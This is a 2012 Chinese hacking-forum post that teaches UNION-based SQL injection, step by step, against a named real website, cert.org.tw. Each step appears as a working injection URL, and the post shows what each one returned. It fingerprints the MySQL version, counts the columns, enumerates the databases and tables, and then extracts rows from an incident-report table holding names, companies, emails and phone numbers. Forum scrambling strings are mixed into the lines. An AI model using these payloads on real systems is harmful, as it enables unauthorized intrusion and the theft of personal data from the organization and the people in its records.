找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1725|回复: 0
打印 上一主题 下一主题

.高级暴库方法讲解

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:57:04 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式
1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询
. a0 m4 E: ]0 o) x, M- R2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解( X4 ?) R( G7 A8 y5 W
http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--
7 A$ ?: j' L3 M4 v. k6 |3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
$ H1 l, s1 ^6 Z5 H5 G数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。
2 U3 ?; |7 ]2 Y: a5 _+ G1 O4.判断有没有写权限/ d$ O# G- t1 F9 `  v; u- S
http://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限
% o7 P  ]( K/ X" }: ]没办法,手动猜表啦
- d  h3 s: j& L6 I5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
- @5 O( N3 _& m( y, M9 H: \, \# c但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下+ \& K# W5 ^- B. y) Z% A  H
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
( ?$ B2 Q% C& m% J4 B成功查出所有数据库,国外的黑客就是不一般。数据库如下:/ Q: E. @+ x! G' L
information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb
6 I) ]! J% d+ k) C6.爆表,爆的是twcert库
% N1 x9 _: D  s0 F: c( Ihttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--' a5 e  _. k9 M! A$ L
爆出如下表+ S8 C) o7 Q$ Q2 [% K2 I6 x* D9 G
downloadfile,irsys,newsdata,secrpt,secrpt_big5
" U4 T3 m! Z" `( r0 J. ?/ b# `7.爆列名,这次爆的是irsys表
; _0 x; s/ _  ahttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
; g' ]0 y( l% a' P) F4 G爆出如下列
! C" u1 \- Z; ^$ h7 I8 Bir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status% M2 {* i$ x; M. G8 e, F% K
8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。
2 ]% s# u- v7 ?- c2 W7 c& t3 t) Chttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--! y1 h$ o* L& n8 s2 g' Y
返回是3,说明每个列里有3个地段8 O' o' V! j: r  i7 f* q
9.爆字段内容
( |5 J6 G* H: f% i0 S' q/ V! I. \. bhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
4 I" h9 V  @0 N6 I7 a爆出name列的第一个字段的内容
" ^# p# [7 J2 Yhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--* A' }* @; @  w4 T
爆出name列的第二个字段的内容
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表